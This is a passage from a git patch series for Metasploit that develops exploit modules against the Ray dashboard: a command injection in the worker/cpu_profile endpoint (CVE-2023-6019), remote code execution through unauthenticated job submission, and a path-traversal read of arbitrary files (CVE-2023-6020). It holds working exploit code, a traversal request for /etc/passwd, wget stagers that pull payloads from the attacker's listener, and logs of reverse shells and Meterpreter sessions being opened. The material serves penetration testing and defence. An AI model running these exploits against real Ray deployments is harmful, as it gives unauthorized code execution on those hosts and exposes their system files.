get_job_data(datastore['COMMAND']) return Exploit::CheckCode::Safe if @job_data.nil? - - return Exploit::CheckCode::Appears when 'CVE-2023-6020' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? - - return Exploit::CheckCode::Appears end + Exploit::CheckCode::Appears end def exploit @@ -161,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote def execute_command(cmd, opts = {}) case datastore['CVE'] when 'CVE-2023-6019' - return send_request_cgi({ + send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), 'vars_get' => { From c71894f3c4a90b281509eb4b449ea0a43b782400 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:21:15 +0900 Subject: [PATCH 10/42] Remove unnecessary DefaultOptions --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 8d8c1995eb..7029b1f3bd 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] ], - 'DefaultOptions' => { 'MeterpreterTryToFork' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => '2023-11-15', 'Notes' => { From b7e4247d22bac04649c592a94605a6f17727d606 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:43:57 +0900 Subject: [PATCH 11/42] Avoid using CVE as option --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 12 +++++----- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 22 +++++++++---------- 2 files changed, 17 insertions(+), 17 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 845e8aa109..8ab6d7b67c 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -41,17 +41,17 @@ This module was successfully tested on: ## Options -### CVE (required) +### ATTACK (required) -This is the vulnerability to use. Default is `CVE-2023-6019`, but `RCE` and `CVE-2023-6020` can also be chosen. +This is the attack type to use. Default is CMDi(`CVE-2023-6019`). but RCE(No CVE) and LFI(`CVE-2023-6020`) can also be chosen. -### COMMAND (required) +### COMMAND (Optional) -This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when CVE is set to `CVE-2023-6019` or `RCE`. +This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. -### FILEPATH (required) +### FILEPATH (Optional) -This is the file to read. Default is `/etc/passwd`. This is used when CVE is set to `CVE-2023-6020`. +This is the file to read. Default is `/etc/passwd`. This is used when ATTACK is set to `LFI`. ## Scenarios diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 7029b1f3bd..68416258db 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -64,9 +64,9 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]), - OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), - OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) + OptEnum.new('ATTACK', [true, 'The attack type to use. Default is CMDi (CVE-2023-6019). but RCE (No CVE) and LFI (CVE-2023-6020) can also be chosen.', 'CMDi', ['CMDi', 'RCE', 'LFI']]), + OptString.new('COMMAND', [ false, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), + OptString.new('FILEPATH', [ false, 'File to read', '/etc/passwd']) ] ) end @@ -110,14 +110,14 @@ class MetasploitModule < Msf::Exploit::Remote end def check - case datastore['CVE'] - when 'CVE-2023-6019' + case datastore['ATTACK'] + when 'CMDi' @nodes = get_nodes return Exploit::CheckCode::Safe if @nodes.nil? when 'RCE' @job_data = get_job_data(datastore['COMMAND']) return Exploit::CheckCode::Safe if @job_data.nil? - when 'CVE-2023-6020' + when 'LFI' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? end @@ -125,8 +125,8 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - case datastore['CVE'] - when 'CVE-2023-6019' + case datastore['ATTACK'] + when 'CMDi' # We need to pass valid node info to /worker/cpu_profile for the server to process the request # First we list all nodes and grab the pid and ip of the first one (could be any) @nodes ||= get_nodes @@ -146,15 +146,15 @@ class MetasploitModule < Msf::Exploit::Remote @job_data ||= get_job_data(datastore['COMMAND']) print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") execute_cmdstager({ flavor: :wget }) - when 'CVE-2023-6020' + when 'LFI' @file_content ||= lfi print_good("#{datastore['FILEPATH']}\n#{@file_content}") end end def execute_command(cmd, opts = {}) - case datastore['CVE'] - when 'CVE-2023-6019' + case datastore['ATTACK'] + when 'CMDi' send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), From 92e2694ac5733ac79542d023ad17093a0728e47e Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:46:44 +0900 Subject: [PATCH 12/42] Use Detected instead of Appears --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 68416258db..719a4ccacd 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? end - Exploit::CheckCode::Appears + Exploit::CheckCode::Detected end def exploit From 4e99e7dfe7b682a0154d4fc8ec49e6a0f4e2a2c8 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:50:42 +0900 Subject: [PATCH 13/42] Use Vulnerable when lfi --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 719a4ccacd..ecb56a1202 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -120,6 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote when 'LFI' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? + return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Detected end From a57678c8d39434c911c6e8d0111dd9444958a770 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 08:51:22 +0900 Subject: [PATCH 14/42] Formatting --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index ecb56a1202..64357fa9ba 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -120,6 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote when 'LFI' @file_content = lfi return Exploit::CheckCode::Safe if @file_content.nil? + return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Detected From f168246796d097c4410ca69441cc7cc088996b28 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 12:49:17 +0900 Subject: [PATCH 15/42] Correct vulnerable version <=v2.6.3 == [ 'sierrabearchell', # Vulnerability discovery From 1f68919a425de00ec46f56ff3fcb5aa11dfb1ac7 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 13:01:23 +0900 Subject: [PATCH 16/42] Fail if optional but required option not set --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 52c335806e..51cf4fb440 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -82,6 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote end def get_job_data(cmd) + fail_with(Failure::Unknown, 'COMMAND required when ATTACK is RCE') unless cmd res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), @@ -100,6 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote end def lfi + fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") From a92b51904a09862997f8cae27038fcc6cee96da6 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 21:16:32 +0900 Subject: [PATCH 17/42] Update document --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 80 +++++++++---------- 1 file changed, 39 insertions(+), 41 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 8ab6d7b67c..b6e473a7eb 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -35,7 +35,7 @@ This module was successfully tested on: 4. Do: `set rhost ` 5. Optional: `set rport ` 6. Do: `set lhost ` -7. Optional: `set CVE ` +7. Optional: `set ATTACK ` 8. Do: `run` 9. You should get a shell or meterpreter @@ -43,19 +43,20 @@ This module was successfully tested on: ### ATTACK (required) -This is the attack type to use. Default is CMDi(`CVE-2023-6019`). but RCE(No CVE) and LFI(`CVE-2023-6020`) can also be chosen. +This is the attack type to use. Default is CMDi (`CVE-2023-6019`). but RCE (No CVE) and LFI (`CVE-2023-6020`) can also be chosen. ### COMMAND (Optional) This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. +This is required when ATTACK is RCE. ### FILEPATH (Optional) -This is the file to read. Default is `/etc/passwd`. This is used when ATTACK is set to `LFI`. +This is the file to read. Default is `/etc/passwd`. This is used and required when ATTACK is set to `LFI`. ## Scenarios -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 0) ``` msf6 > use exploit/linux/http/ray_cmdi_rce_lfi [*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp @@ -63,23 +64,19 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 -cve => CVE-2023-6019 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 -target => 0 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[!] The service is running, but could not be validated. [+] Grabbed node info, pid: 124, ip: 172.17.0.2 [+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/VvzBBm8 -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8 +[*] Using URL: http://192.168.56.1:8080/gSfnYt3 +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /gSfnYt3 [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40066) at 2024-08-07 21:00:50 +0900 [*] Command Stager progress - 100.00% done (112/112 bytes) -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900 [*] Server stopped. meterpreter > sysinfo @@ -91,14 +88,14 @@ Meterpreter : x64/linux meterpreter > ``` -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1) +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CMDi, target 1) ``` +msf6 > use exploit/linux/http/ray_cmdi_rce_lfi +[*] Using configured payload linux/x86/shell/reverse_tcp msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 -cve => CVE-2023-6019 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 target => 1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp @@ -107,15 +104,15 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[!] The service is running, but could not be validated. [+] Grabbed node info, pid: 124, ip: 172.17.0.2 [+] Command execution seems to have been successful. Status code: 500 -[*] Using URL: http://192.168.56.1:8080/tMBeDO -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO +[*] Using URL: http://192.168.56.1:8080/l7pOn5OcI8ed4P +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /l7pOn5OcI8ed4P [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900 -[*] Command Stager progress - 100.00% done (111/111 bytes) +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:34826) at 2024-08-07 21:02:30 +0900 +[*] Command Stager progress - 100.00% done (119/119 bytes) [*] Server stopped. whoami @@ -130,8 +127,8 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE -cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE +attack => RCE msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 target => 0 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp @@ -140,14 +137,14 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. -[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN' -[*] Using URL: http://192.168.56.1:8080/roy19E -[*] Command Stager progress - 100.00% done (111/111 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E +[!] The service is running, but could not be validated. +[+] Command execution successful. Job ID: 'raysubmit_hUcEzX4nBCdr5m3m' Submission ID: 'raysubmit_hUcEzX4nBCdr5m3m' +[*] Using URL: http://192.168.56.1:8080/lISIUc6V +[*] Command Stager progress - 100.00% done (113/113 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /lISIUc6V [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (38 bytes) to 192.168.56.6 -[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900 +[*] Command shell session 6 opened (192.168.56.1:4444 -> 192.168.56.6:49312) at 2024-08-07 21:07:51 +0900 [*] Server stopped. whoami @@ -162,8 +159,8 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 lhost => 192.168.56.1 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE -cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack RCE +attack => RCE msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 target => 1 msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp @@ -172,33 +169,34 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. -[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy' -[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh -[*] Command Stager progress - 100.00% done (115/115 bytes) -[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh +[!] The service is running, but could not be validated. +[+] Command execution successful. Job ID: 'raysubmit_arSdaUWQZPCJy4mr' Submission ID: 'raysubmit_arSdaUWQZPCJy4mr' +[*] Using URL: http://192.168.56.1:8080/OPTAuZv1pjimlr +[*] Command Stager progress - 100.00% done (119/119 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /OPTAuZv1pjimlr [*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) [*] Sending stage (36 bytes) to 192.168.56.6 -[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900 +[*] Command shell session 5 opened (192.168.56.1:4444 -> 192.168.56.6:45048) at 2024-08-07 21:06:40 +0900 [*] Server stopped. whoami ray pwd -/home/ray ``` -### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020) +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (LFI) ``` msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 rhost => 192.168.56.6 -msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020 -cve => CVE-2023-6020 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set attack LFI +attack => LFI msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. +[+] The target is vulnerable. [+] /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin From 35354c840721f7e578ba70655f07fde4bac23b54 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Wed, 7 Aug 2024 21:20:09 +0900 Subject: [PATCH 18/42] Update document --- documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 1 + 1 file changed, 1 insertion(+) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index b6e473a7eb..514b2be86f 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -182,6 +182,7 @@ msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run whoami ray pwd +/home/ray ``` ### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (LFI) From 064d463c37aa68247afa1f1bb85a0abab61c0cd8 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 8 Aug 2024 07:45:16 +0900 Subject: [PATCH 19/42] Formatting doc --- documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md index 514b2be86f..846cf9fb44 100644 --- a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md @@ -47,8 +47,8 @@ This is the attack type to use. Default is CMDi (`CVE-2023-6019`). but RCE (No C ### COMMAND (Optional) -This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when ATTACK is set to `CMDi` or `RCE`. -This is required when ATTACK is RCE. +This is the command to execute. Default is `echo 'Hello from Metasploit'`. +This is used when ATTACK is set to `CMDi` or `RCE` and required when ATTACK is `RCE`. ### FILEPATH (Optional) From c36c2eea384ff5c6f68e52541f79c36a5d5ac721 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 9 Aug 2024 08:51:14 +0900 Subject: [PATCH 20/42] Separate modules --- .../auxiliary/gather/ray_lfi_cve_2023_6020.rb | 70 ++++++++++++ .../exploits/linux/http/ray_agent_job_rce.rb | 96 ++++++++++++++++ ...cpu_profile_cmd_injection_cve_2023_6019.rb | 103 ++++++++++++++++++ 3 files changed, 269 insertions(+) create mode 100644 modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb create mode 100644 modules/exploits/linux/http/ray_agent_job_rce.rb create mode 100644 modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb diff --git a/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb new file mode 100644 index 0000000000..3ce723ef65 --- /dev/null +++ b/modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Ray static arbitrary file read', + 'Description' => %q{ + Ray before 2.8.1 is vulnerable to a local file inclusion. + }, + 'Author' => [ + 'byt3bl33d3r ', # Python Metasploit module + 'danmcinerney ', # Python Metasploit module + 'Takahiro Yokoyama' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2023-6020'], + ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'], + ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] + ], + 'DisclosureDate' => '2023-11-15', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [], + 'Reliability' => [ IOC_IN_LOGS, ] + } + ) + ) + + register_options( + [ + Opt::RPORT(8265), + OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) + ] + ) + end + + def check + @file_content = lfi + return Exploit::CheckCode::Safe if @file_content.nil? + + Exploit::CheckCode::Vulnerable + end + + def lfi + fail_with(Failure::Unknown, 'FILEPATH required when ATTACK is LFI') unless datastore['FILEPATH'] + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") + }) + return unless res && res.code == 200 + + res.body + end + + def run + @file_content ||= lfi + print_good("#{datastore['FILEPATH']}\n#{@file_content}") + end + +end diff --git a/modules/exploits/linux/http/ray_agent_job_rce.rb b/modules/exploits/linux/http/ray_agent_job_rce.rb new file mode 100644 index 0000000000..f06e762fd5 --- /dev/null +++ b/modules/exploits/linux/http/ray_agent_job_rce.rb @@ -0,0 +1,96 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Ray Agent Job RCE', + 'Description' => %q{ + RCE in Ray via the agent job submission endpoint. + This is intended functionality as Ray's main purpose is executing arbitrary workloads. + By default Ray has no authentication. + }, + 'Author' => [ + 'sierrabearchell', # Vulnerability discovery + 'byt3bl33d3r ', # Python Metasploit module + 'Takahiro Yokoyama' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], + ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'] + ], + 'CmdStagerFlavor' => %i[wget], + 'Payload' => { + 'DisableNops' => true + }, + 'Platform' => %w[linux], + 'Targets' => [ + [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2023-11-15', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [], + 'Reliability' => [ REPEATABLE_SESSION, ] + } + ) + ) + + register_options( + [ + Opt::RPORT(8265), + OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), + ] + ) + end + + def get_job_data(cmd) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), + 'data' => { 'entrypoint' => cmd }.to_json + }) + unless res && res.code == 200 + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), + 'data' => { 'entrypoint' => cmd }.to_json + }) + end + return unless res && res.code == 200 + + JSON.parse(res.body) + end + + def check + @job_data = get_job_data(datastore['COMMAND']) + return Exploit::CheckCode::Safe if @job_data.nil? + + Exploit::CheckCode::Detected + end + + def exploit + @job_data ||= get_job_data(datastore['COMMAND']) + print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + execute_cmdstager({ flavor: :wget }) + end + + def execute_command(cmd, _opts = {}) + get_job_data(cmd) + end + +end diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb new file mode 100644 index 0000000000..0dafcf6bfa --- /dev/null +++ b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb @@ -0,0 +1,103 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Ray cpu_profile command injection', + 'Description' => %q{ + Ray RCE via cpu_profile command injection vulnerability. + }, + 'Author' => [ + 'sierrabearchell', # Vulnerability discovery + 'byt3bl33d3r ', # Python Metasploit module + 'Takahiro Yokoyama' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2023-6019'], + ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], + ], + 'CmdStagerFlavor' => %i[wget], + 'Payload' => { + 'DisableNops' => true + }, + 'Platform' => %w[linux], + 'Targets' => [ + [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2023-11-15', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [], + 'Reliability' => [ REPEATABLE_SESSION, ] + } + ) + ) + + register_options( + [ + Opt::RPORT(8265), + ] + ) + end + + def get_nodes + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary') + }) + return unless res && res.code == 200 + + JSON.parse(res.body) + end + + def check + @nodes = get_nodes + return Exploit::CheckCode::Safe if @nodes.nil? + + Exploit::CheckCode::Detected + end + + def exploit + # We need to pass valid node info to /worker/cpu_profile for the server to process the request + # First we list all nodes and grab the pid and ip of the first one (could be any) + @nodes ||= get_nodes + fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes + first_node = @nodes['data']['summary'].first + fail_with(Failure::Unknown, 'Failed to get pid') unless 